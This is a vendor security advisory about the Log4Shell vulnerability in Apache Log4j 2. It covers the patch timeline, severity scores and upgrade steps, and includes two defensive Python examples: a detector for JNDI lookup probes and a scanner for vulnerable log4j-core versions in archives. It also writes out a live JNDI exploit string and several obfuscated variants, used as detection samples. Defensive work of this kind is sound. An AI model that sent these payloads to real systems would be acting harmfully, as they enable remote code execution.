Originally posted: Dec 10th, 2021 (All times Eastern/ U.S.)
This page is updated frequently. Please see the date/time (GMT) in the byline for the most current article update.
- What happened? What and who specifically does this impact?
- What is the vulnerability / incident?
- Why is it bad?
- How likely is it?
- How severe is it?
- How is this relevant for Contrast Security and which customers might be impacted?
- How does a Contrast customer determine if and where they’re vulnerable?
- What should a Contrast customer do, if anything?
- Related Articles
What happened? What and who specifically does this impact?
A zero-day vulnerability in the ubiquitous Apache Log4j 2 library was disclosed at ~9:30 a.m. US Eastern on 2021-12-09 and is now tracked as CVE-2021-44228.
All Contrast customers were impacted. The vulnerable library was confirmed to be in use in the Contrast application in both SaaS and On-Premises ("EOP") deployments. Contrast has identified no evidence of any penetration at this time.
- 12/9/2021 at 22:15 EST, Contrast had patched the SaaS application to log4j 2.15.
- 12/14/2021 at 15:37 EST, Contrast patched all SaaS applications to log4j 2.16.
- 12/18/2021 at 11:36 EST, Contrast patched all SaaS applications to log4j 2.17.
- 12/18/2021 at 12:18 EST, Contrast released a patched EOP with log4j 2.17.
The upgrade to log4j 2.17 covers all three CVEs listed below (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105).
For On-Premises customers, Contrast has released a patched version with log4j 2.17, and all customers are recommended to upgrade.
Of note: while Contrast software is impacted and we are notifying all customers, it is extremely likely that your company's own Java application portfolio is also impacted. Please take measures to upgrade/update your portfolio immediately. Contrast Protect guards most applications against most attack vectors, including the published proofs of concept, and we are working to close the gaps we have identified internally.
What is the vulnerability / incident?
CVE-2021-44228 - More information from the National Vulnerability Database can be found (here).
Additional references can be found on social media platforms like Twitter (here).
Why is it bad?
The library in question is very widely distributed across Java applications. Contrast believes this CVE will have an extremely broad impact in the community, affecting the majority of Java applications.
Contrast has confirmed that this library was in use across several Contrast products (details below).
How likely is it?
Any application that uses Log4j 2 to log any information controlled by the attacker is vulnerable, including any HTTP headers, URIs, parameters, or cookies. Exploitation is exceptionally simple and can be easily automated. For example, sending "${jndi:rmi://192.168.1.31:1099/9tmpja}" in a single HTTP request is enough to achieve remote code execution in the application's JVM, with the privileges of the application process. The risk is especially high if your system is reachable from the Internet: we are detecting widespread automated attacks against our customers. Contrast Labs has confirmed that the vulnerability is exploitable.
Our evaluation efforts will continue and we will keep you apprised of our progress.
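A simple substring match on "${jndi:" misses the obfuscated forms the automated scanners mentioned above use, because Log4j 2 evaluates nested lookups (lower:, upper:, env: with ":-" defaults) before it sees the jndi: prefix. The example below, added to this page and not Contrast product code, evaluates that lookup syntax innermost-first, far enough to see what the logger would have resolved, and runs it over a few constructed access-log lines (sample data, not real traffic). The payload on the second line is the one quoted above; the others are common obfuscations. Lookup prefixes other than jndi:, lower: and upper: are modelled only by their ":-" default, which is the assumption the obfuscations rely on.

```python
"""Detect Log4Shell-style JNDI lookup probes in attacker-controlled strings
(headers, URIs, parameters, cookies) by evaluating Log4j 2's nested-lookup
syntax far enough to see what the logger would have resolved.
Added example for this page; not Contrast product code."""
import re

INNERMOST = re.compile(r"\$\{([^{}]*)\}")   # a ${...} with no nested braces
MAX_STEPS = 100                              # bound the expansion (cf. CVE-2021-45105)


def _eval_lookup(name):
    """Evaluate one lookup roughly as Log4j's StrSubstitutor/Interpolator does.

    Returns (replacement_text, jndi_target_or_None). Only the pieces attackers
    use for obfuscation are modelled: ':-' defaults, lower:, upper:, jndi:.
    Other lookups (env:, sys:, date:, ...) resolve to their default or to ''.
    """
    default = None
    if ":-" in name:                        # ${env:NOPE:-j} -> "j", ${::-j} -> "j"
        name, default = name.split(":-", 1)
    prefix, _, key = name.partition(":")
    prefix = prefix.lower()                 # Log4j lower-cases the prefix
    if prefix == "jndi":
        return "<JNDI>", key                # record the target instead of resolving it
    if prefix == "lower":
        return key.lower(), None
    if prefix == "upper":
        return key.upper(), None
    return (default if default is not None else ""), None


def resolve_lookups(text):
    """Expand nested ${...} innermost-first; return (resolved_text, jndi_targets)."""
    targets = []
    for _ in range(MAX_STEPS):
        m = INNERMOST.search(text)
        if not m:
            break
        replacement, target = _eval_lookup(m.group(1))
        if target is not None:
            targets.append(target)
        text = text[:m.start()] + replacement + text[m.end():]
    return text, targets


def is_log4shell_probe(text):
    """True if logging this string would trigger a JNDI lookup."""
    return bool(resolve_lookups(text)[1])


# Constructed sample access-log lines (not real traffic). Line 2 carries the
# plain payload quoted on this page; lines 3 and 4 use common obfuscations;
# line 5 contains lookups that are not JNDI and must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${jndi:rmi://192.168.1.31:1099/9tmpja}"',
    '10.0.0.8 - - "GET /?q=${${lower:j}ndi:ldap://192.168.1.31:1389/a} HTTP/1.1" 200 "-"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}${::-n}${::-d}${lower:I}:ldap://192.168.1.31/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${sys:java.version} ${date:yyyy}"',
]


def flag_lines(lines):
    """Return (line, jndi_targets) for every line that would trigger JNDI."""
    hits = []
    for line in lines:
        _, targets = resolve_lookups(line)
        if targets:
            hits.append((line, targets))
    return hits


if __name__ == "__main__":
    for line, targets in flag_lines(SAMPLE_LOG_LINES):
        print("JNDI ->", targets, "|", line)
```

Run it as-is to see the three probe lines flagged with their resolved rmi:// and ldap:// targets; the bounded loop is deliberate, since unbounded expansion of self-referential lookups is exactly the denial-of-service condition of CVE-2021-45105. Treat the detector as a triage aid for logs and WAF rules, not as a substitute for upgrading: an attacker who controls the logged string has many more encodings available than the handful modelled here.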
How severe is it?
While these CVEs are still under scrutiny by the National Institute of Standards and Technology (NIST), NIST has set initial CVSS scores, and the Apache Software Foundation continues to update its own scores. Contrast experts agree with the ASF scoring and have updated our CVE scoring to reflect these updates.
CVE-2021-44228 - CVSS 10.0
- More information from the National Vulnerability Database can be found (here)
- Apache Software Foundation rates this as a 10.0 CVSS (here)
- Fixed in version 2.15
CVE-2021-45046 - CVSS 9.0
- More information from the National Vulnerability Database can be found (here)
- Apache Software Foundation rates this as a 9.0 CVSS (here)
- Fixed in version 2.16
CVE-2021-45105 - CVSS 7.5
- More information from the National Vulnerability Database can be found (here)
- Apache Software Foundation rates this as a 7.5 CVSS (here)
- Fixed in version 2.17
How is this relevant for Contrast Security and which customers might be impacted?
Contrast hosted (SaaS) customers would have been impacted had this been exploited. Our teams have patched all hosted (SaaS) systems, and no evidence of penetration has been detected.
Contrast EOP customers whose systems are accessible via the web should patch their system immediately. A patched version of EOP has been released and all customers are recommended to upgrade ASAP.
The Contrast Java agent is not impacted. In order for Contrast Security products to support applications that use legacy technologies and frameworks such as Java 6, Java 7 and JBoss, our Java agent uses an older version of log4j (1.x), which does not contain the JNDI lookup affected by these CVEs. Our team audits our dependencies for security risk and has found our usage of log4j 1.x to be an acceptable risk. However, we are looking into releasing a newer version of the Java agent that does not depend on log4j 1.x, which may not support the legacy frameworks mentioned above.
Product                          | Impacted | Protected                       | Patched
Hosted (SaaS) Environments (all) | Yes      | Yes (Contrast Protect in place) | Yes
On-premises (EOP) Environments   | Yes      | No                              | Yes
Java Agent                       | No       | N/A                             | N/A
Scan                             | Yes      | Yes (Contrast Protect in place) | Yes
How does a Contrast customer determine if and where they’re vulnerable?
All versions of Contrast EOP TeamServer prior to 3.8.10.1566200307 are vulnerable to this zero-day. Additionally, per ASF recommendations, we have released 3.8.10.1589286247, which adds protection against CVE-2021-45046 by updating to log4j 2.16, and a further release, 3.8.10.1596449597, which adds protection against CVE-2021-45105 by updating to log4j 2.17.
What should a Contrast customer do, if anything?
On-Premises customers are recommended to upgrade to the latest patched version (3.8.10.1596449597 or higher), available on Hub (here). Standard upgrade instructions (here) can be followed.
For their own portfolio of Java applications, customers will need to search for the vulnerable library (log4j-core) in their apps, including copies bundled inside WAR/EAR archives, and update to the patched library as soon as possible. Contrast Labs has also confirmed that Contrast Assess will flag this vulnerability as "Log Injection" in vulnerable code paths. Contrast SCA will also identify the vulnerable library. Contrast has published a blog with recommended fixes for all vulnerable Java applications here: https://www.contrastsecurity.com/security-influencers/0-day-detection-of-log4j2-vulnerability
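For teams that need to do that search by hand, the example below, added to this page and not Contrast tooling, walks a directory, opens every JAR/WAR/EAR (recursing into archives nested inside archives, which is where most application copies of log4j-core live), reads the log4j-core version from its Maven pom.properties, and reports which of the three CVEs on this page remain open against the fix versions 2.15/2.16/2.17 given above. It also embeds a constructed sample WAR with a fake log4j-core 2.14.1 inside it so it runs offline; the class bytes in that sample are placeholders, not a real JndiLookup.class.

```python
"""Find log4j-core inside JAR/WAR/EAR files (including nested archives) and
classify each copy against the fix versions named on this page.
Added example; not Contrast product code."""
import io
import os
import re
import sys
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

# First log4j 2.x release that fixes each CVE, as stated on this page.
FIXES = [("CVE-2021-44228", (2, 15, 0)),
         ("CVE-2021-45046", (2, 16, 0)),
         ("CVE-2021-45105", (2, 17, 0))]


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); unparseable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def open_cves(version):
    """CVEs from this page still open at the given log4j-core version."""
    if version is None:
        return [cve for cve, _ in FIXES]          # unknown version: assume unpatched
    return [cve for cve, fixed_in in FIXES if version < fixed_in]


def read_version(zf):
    """log4j-core version from pom.properties, or None if absent."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(data, path, findings):
    """Scan an archive held in memory; recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if JNDI_LOOKUP in names or POM_PROPS in names:
            version = read_version(zf)
            findings.append({
                "path": path,
                "version": version,
                "jndi_lookup_present": JNDI_LOOKUP in names,
                "open_cves": open_cves(parse_version(version)),
            })
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(name), path + "!" + name, findings)


def scan_path(root):
    """Walk a directory tree and scan every archive found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def build_sample_war(version="2.14.1"):
    """Constructed sample: a WAR embedding a fake log4j-core-<version>.jar."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")   # placeholder, not a real class
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr(f"WEB-INF/lib/log4j-core-{version}.jar", core.getvalue())
    return war.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_path(sys.argv[1])          # e.g. python scan.py /opt/apps
    else:
        results = []
        scan_archive(build_sample_war(), "sample.war", results)
    for r in results:
        print(r["path"], r["version"], ", ".join(r["open_cves"]) or "patched")
```

Two caveats a practitioner should keep in mind. The version comparison follows the 2.15/2.16/2.17 fix line this page describes; the ASF also shipped backports for older Java runtimes (the 2.12.x and 2.3.x lines), and this script will report those as unpatched even when they are fixed, so check them by hand. And a copy of log4j-core whose JndiLookup.class has been deleted, or a shaded/relocated copy under a different package path, will not be matched by these two file names; the jndi_lookup_present flag is there so that a JAR with pom.properties but no JndiLookup.class can be recognised as the class-removal mitigation rather than a vulnerable copy.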
If you have any questions, concerns, or would like to discuss this issue further, please don’t hesitate to reach out to us via the link below or at support@contrastsecurity.com.